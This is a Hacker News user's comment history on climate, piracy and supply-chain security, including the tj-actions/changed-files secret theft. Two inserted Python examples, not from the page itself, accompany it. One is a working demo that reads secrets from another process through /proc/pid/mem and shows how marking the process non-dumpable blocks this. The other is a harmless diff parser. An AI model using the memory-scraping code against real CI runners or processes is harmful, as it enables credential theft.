cyrnel commented on How does the US use water?   construction-physics.com/... · Posted by u/juliangamble
xyst · 7 days ago
With the rise in climate change and _collective inaction_, we are on a trajectory for mass extinction [1].

With the second AI gold rush coming to a near abrupt stop, political climates worsening, and billionaires continuing to loot the collective populace through their pawns in the kakistocracy (USA) and kleptocracy (Russia), we are absolutely cooked.

What’s the point anymore? What are we even solving? Being a _good_ person is no longer worth any value. Just exploit and climb over each other like crabs in a barrel.

[1] https://www.washingtonpost.com/climate-environment/2024/09/1...

cyrnel · 7 days ago
It's true that we were all sold the lie of individual actions being the way to solve the climate crisis (recycling, turning off lights, etc.), but I think the conclusion is to try other strategies rather than giving up when the first strategy didn't work.
cyrnel commented on Anna's Archive: An Update from the Team   annas-archive.org/blog/an... · Posted by u/jerheinze
computerdork · 10 days ago
Know am going to be downvoted into oblivion, but as a composer, can see it from the side of creators. Yeah, making their products free is starving these industries. For instance, in music, there is already very little money in music (think about how many musicians you personally know who can make a living off of music, besides being a music teacher). And, the music industry is still not even the same size as it was in the 90's - global revenue in 2024 was $29 billion, while in 1994, it was $35 billion (and that's not even taking into account inflation).

Yes, there are many other reasons why the music industry fell, but when your main demographic can always go to bittorrent to get their music if prices are too high, then there is only so much you can do with the price of music.

Yeah, I remember the 90's, music was huge, and there were so many good bands (Smashing Pumpkins, Nirvana, REM, White Stripes... Or if you're more into popular music, Michael Jackson, Whitney Houston...). Now, music is de-valued and cheap and our music scene has been decimated. Personally, think we should try to find ways to support musicians, writers, thinkers, artists...

... but if you have a different opinion, no worries. But, if you can, give it thought.

cyrnel · 10 days ago
The ideal situation would be building a society that believes everyone deserves to be fed, clothed, and housed regardless of their ability to make profitable things. Weird how politically unpopular that seems to be.

Both producers and consumers of media are in the same boat of barely surviving. Maybe we can work with each other instead of against each other? :)

cyrnel commented on Demonstrably Secure Software Supply Chains with Nix   nixcademy.com/posts/secur... · Posted by u/todsacerdoti
cyrnel · 4 months ago
This seems to only address a few of the nine threats to the software supply chain, mainly "(D) External build parameters" and maybe the content-addressable storage addresses some of the distribution phase threats: https://slsa.dev/spec/v1.1/threats

There are still many other ways that a dependency can be exploited before or after the build phase.

cyrnel commented on Burrito Now, Pay Later   enterprisevalue.substack.... · Posted by u/gwintrob
cyrnel · 4 months ago
BNPL is only "good" if your definition of "good" is about GDP, market flexibility, high-performance index funds, and other things that have nothing to do with human happiness.

I'll believe that BNPL is good when all the companies become non-profits that use excess funds to cancel debts rather than lining the pockets of rich investors.

cyrnel commented on How to harden GitHub Actions   wiz.io/blog/github-action... · Posted by u/moyer
abhisek · 4 months ago
GitHub Actions by default provide isolated VM with root privilege to a workflow. Don’t think job level privilege isolation is in its threat model currently. Although it does allow job level scopes for the default GitHub token.

Also the secrets are accessible only when a workflow is invoked from a trusted trigger, i.e. not from a forked repo. Not sure what else can be done here to protect against a compromised 3rd party action.

cyrnel · 4 months ago
People have been running different levels of privileged code together on the same machine ever since the invention of virtual machines. We have lots of lightweight sandboxing technologies that could be used when invoking a particular action such as tj-actions/changed-files that only gives it the permissions it needs.

You may do a "docker build" in a pipeline which does need root access and network access, but when you publish a package on pypi, you certainly don't need root access and you also don't need access to the entire internet, just the pypi API endpoint(s) necessary for publishing.

cyrnel commented on How to harden GitHub Actions   wiz.io/blog/github-action... · Posted by u/moyer
esafak · 4 months ago
Where can I read about this? I see no reference in its repo: https://github.com/search?q=repo%3Atj-actions%2Fchanged-file...
cyrnel · 4 months ago
Every action gets these permissions by default. The reason we know it had that permission is that the exploit code read from /proc/pid/mem to steal the secrets, which requires some permissions: https://blog.cloudflare.com/diving-into-proc-pid-mem/#access...

Linux processes have tons of default permissions that they don't really need.
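An added example, not code from the Wiz post, from tj-actions, or from any commenter, showing what the access check behind /proc/pid/mem looks like in practice: a parent process scans a child's anonymous, heap and stack mappings for a constructed secret, first with the child in its default (dumpable) state and then after the child has called prctl(PR_SET_DUMPABLE, 0). The secret string, the child script and the helper names (`spawn_secret_holder`, `scrape`, `demo`, `has_cap_sys_ptrace`) are all assumptions for this demo. Linux only; whether the non-dumpable read still succeeds depends on whether the reader holds CAP_SYS_PTRACE, which the block checks from its own CapEff mask.

```python
"""Added example: reading a secret out of another process via /proc/<pid>/mem,
and how PR_SET_DUMPABLE changes the kernel's ptrace_may_access() decision.
Linux only. The secret below is constructed for the demo, not a real token."""
import ctypes
import os
import re
import subprocess
import sys

PR_SET_DUMPABLE = 4        # prctl(2) option
CAP_SYS_PTRACE = 19        # capability bit number, see capabilities(7)
MAX_REGION = 64 << 20      # skip mappings larger than this to keep the scan cheap
MAPS_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+) (\S{4}) \S+ \S+ \S+ *(.*)$")


def has_cap_sys_ptrace() -> bool:
    """True if this process's effective capability set includes CAP_SYS_PTRACE."""
    with open("/proc/self/status") as f:
        for line in f:
            if line.startswith("CapEff:"):
                return bool(int(line.split()[1], 16) >> CAP_SYS_PTRACE & 1)
    return False


def spawn_secret_holder(secret: str, dumpable: bool) -> subprocess.Popen:
    """Start a child (hypothetical 'runner' process) that keeps `secret` in its
    heap, optionally marks itself non-dumpable, prints 'ready' and then blocks."""
    child = f"""
import ctypes, sys, time
buf = bytearray({secret!r}.encode())          # the credential, in the child's heap
if not {dumpable!r}:
    libc = ctypes.CDLL(None, use_errno=True)
    if libc.prctl({PR_SET_DUMPABLE}, 0, 0, 0, 0) != 0:
        raise SystemExit("prctl failed: %d" % ctypes.get_errno())
sys.stdout.write("ready\\n"); sys.stdout.flush()
time.sleep(60)
"""
    p = subprocess.Popen([sys.executable, "-c", child], stdout=subprocess.PIPE, text=True)
    if p.stdout.readline().strip() != "ready":
        p.kill()
        raise RuntimeError("secret holder failed to start")
    return p


def scrape(pid: int, needle: bytes) -> dict:
    """Scan pid's readable non-file-backed mappings through /proc/pid/mem for
    `needle`. Returns {'found': bool, 'error': str | None, 'regions': int}.
    Opening maps/mem is where the kernel applies the ptrace access check."""
    result = {"found": False, "error": None, "regions": 0}
    try:
        with open(f"/proc/{pid}/maps") as maps, open(f"/proc/{pid}/mem", "rb", 0) as mem:
            for line in maps:
                m = MAPS_RE.match(line)
                if not m:
                    continue
                start, end, perms, path = int(m[1], 16), int(m[2], 16), m[3], m[4]
                if "r" not in perms or path.startswith("/") or end - start > MAX_REGION:
                    continue  # unreadable, file-backed (binary/libs), or too big
                try:
                    mem.seek(start)
                    data = mem.read(end - start)
                except (OSError, OverflowError):
                    continue  # e.g. [vvar] returns EIO; [vsyscall] overflows off_t
                result["regions"] += 1
                if data and needle in data:
                    result["found"] = True
                    break
    except PermissionError as e:
        # EPERM/EACCES: ptrace_may_access() refused us (non-dumpable target,
        # Yama ptrace_scope, or missing CAP_SYS_PTRACE)
        result["error"] = f"{e.__class__.__name__}: {e}"
    return result


def demo(secret: str, dumpable: bool) -> dict:
    """Spawn a holder, try to steal `secret` from it, always clean up."""
    holder = spawn_secret_holder(secret, dumpable)
    try:
        return scrape(holder.pid, secret.encode())
    finally:
        holder.kill()
        holder.wait()
        holder.stdout.close()


if __name__ == "__main__":
    secret = "GHS_EXAMPLE_SECRET_d3adb33f"   # constructed, not a real token
    print("uid:", os.geteuid(), "CAP_SYS_PTRACE in CapEff:", has_cap_sys_ptrace())
    print("dumpable child:    ", demo(secret, True))
    print("non-dumpable child:", demo(secret, False))
```

Run it as the unprivileged user a CI step runs as. Under the common Yama ptrace_scope=1 setting the parent may read its own child, so the dumpable child gives up the secret with no special privilege at all; the non-dumpable child fails at open() with EPERM/EACCES unless the reader holds CAP_SYS_PTRACE. That is why a process holding credentials should clear its dumpable flag, and why a step that only needs to compute a diff should not be carrying that capability in the first place.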

cyrnel commented on How to harden GitHub Actions   wiz.io/blog/github-action... · Posted by u/moyer
cyrnel · 4 months ago
This has some good advice, but I can't help but notice that none of this solves a core problem with the tj-actions/changed-files issue: The workflow had the CAP_SYS_PTRACE capability when it didn't need it, and it used that permission to steal secrets from the runner process.

You don't need to audit every line of code in your dependencies and their subdependencies if your dependencies are restricted to only doing the thing they are designed to do and nothing more.

There's essentially nothing nefarious changed-files could do if it were limited to merely reading a git diff provided to it on stdin.

GitHub provides no mechanism to do this, probably because posts like this one never even call out the glaring omission of a sandboxing feature.
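An added example, not from the Wiz post, from tj-actions/changed-files, or from any commenter, of what the stdin-only design described in the comment above could look like: a script that consumes `git diff --name-status -z` from stdin and emits the usual changed-file lists, touching no token, no network and not even the checkout directory. The output names are loosely modelled on the action's, the glob filtering is a simplification, and the sample diff in the test is constructed; the script and its function names are assumptions for this illustration.

```python
"""Added example: a changed-files style helper that only reads a git diff from
stdin. A workflow step would run something like
    git diff --name-status -z "$BASE...$HEAD" | python changed_files.py '*.py' 'docs/*'
so the helper needs no GITHUB_TOKEN, no network egress and no filesystem access."""
import fnmatch
import sys

# `git diff --name-status` status letters; R and C carry a similarity score (R100).
CATEGORY = {"A": "added", "M": "modified", "D": "deleted",
            "T": "type_changed", "U": "unmerged"}


def parse_name_status_z(data: bytes) -> dict:
    """Parse NUL-delimited `git diff --name-status -z` output.
    With -z git does not quote paths, so names containing spaces or newlines
    stay intact. Renames/copies become (old, new) pairs; the rest are path lists."""
    out = {"added": [], "modified": [], "deleted": [], "type_changed": [],
           "unmerged": [], "renamed": [], "copied": []}
    fields = data.split(b"\0")
    if fields and fields[-1] == b"":
        fields.pop()  # drop the trailing NUL terminator
    i = 0
    while i < len(fields):
        status = fields[i].decode("utf-8", "surrogateescape")
        code = status[:1]
        if code in ("R", "C"):
            if i + 2 >= len(fields):
                raise ValueError(f"truncated {status} record at field {i}")
            pair = (fields[i + 1].decode("utf-8", "surrogateescape"),
                    fields[i + 2].decode("utf-8", "surrogateescape"))
            out["renamed" if code == "R" else "copied"].append(pair)
            i += 3
        elif code in CATEGORY and len(status) == 1:
            if i + 1 >= len(fields):
                raise ValueError(f"truncated {status} record at field {i}")
            out[CATEGORY[code]].append(fields[i + 1].decode("utf-8", "surrogateescape"))
            i += 2
        else:
            raise ValueError(f"unexpected status token {status!r}")
    return out


def changed_paths(parsed: dict) -> list:
    """Paths that exist after the diff: added, modified, type-changed, rename/copy targets."""
    paths = (parsed["added"] + parsed["modified"] + parsed["type_changed"]
             + [new for _, new in parsed["renamed"]]
             + [new for _, new in parsed["copied"]])
    return sorted(set(paths))


def select(paths, patterns):
    """Keep paths matching any glob (fnmatch semantics: '*' also crosses '/').
    No patterns means keep everything."""
    if not patterns:
        return list(paths)
    return [p for p in paths if any(fnmatch.fnmatch(p, pat) for pat in patterns)]


def outputs(parsed: dict, patterns=(), sep=" ") -> dict:
    """Build GITHUB_OUTPUT-style key/value pairs. The default space separator
    mirrors common practice but cannot represent paths containing spaces;
    pass sep="\\n" (and quote the consumer) when that matters."""
    changed = select(changed_paths(parsed), patterns)
    deleted = select(sorted(parsed["deleted"]), patterns)
    return {
        "any_changed": str(bool(changed)).lower(),
        "any_deleted": str(bool(deleted)).lower(),
        "all_changed_files": sep.join(changed),
        "added_files": sep.join(select(sorted(parsed["added"]), patterns)),
        "modified_files": sep.join(select(sorted(parsed["modified"]), patterns)),
        "deleted_files": sep.join(deleted),
    }


if __name__ == "__main__":
    parsed = parse_name_status_z(sys.stdin.buffer.read())
    for key, value in outputs(parsed, sys.argv[1:]).items():
        print(f"{key}={value}")
```

The point is the shape, not the parsing: because every input arrives on stdin and every result leaves on stdout, the step can be run with no token in its environment, no network, and a read-only or empty working directory, and a compromised copy of it has nothing to reach for.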

cyrnel commented on Redis is open source again   antirez.com/news/151... · Posted by u/antirez
kiitos · 4 months ago
Statistically nobody is using valkey.
cyrnel · 4 months ago
Amazon really encourages valkey in the elasticache dashboard. There's a banner advertising lower prices and it's listed first in the dropdown when you go to create one. Default settings do have power.
cyrnel commented on Deafening Silence from the Cybersecurity Industry   forbes.com/sites/tonybrad... · Posted by u/rbanffy
cyrnel · 4 months ago
I think this article describes the issue well:

https://crankysec.com/blog/community/

> All the cybersecurity companies saying "We don't have anything to say about this situation." is just them being true to their main in-group: for-profit companies that don't want to upset a big current or potential buyer. They are, first and foremost, part of that "community", and they happen to be involved in cybersecurity. Solidarity is happening there, just not to the people in cybersecurity.

This sucks and we should change it for sure. So many other industries have successfully become professionalized, unionized, and kicked the grifters to the curb. But it feels more and more like the cybersecurity grifters are the ones holding the reins.

u/cyrnel · Karma 384 · Cake day July 1, 2023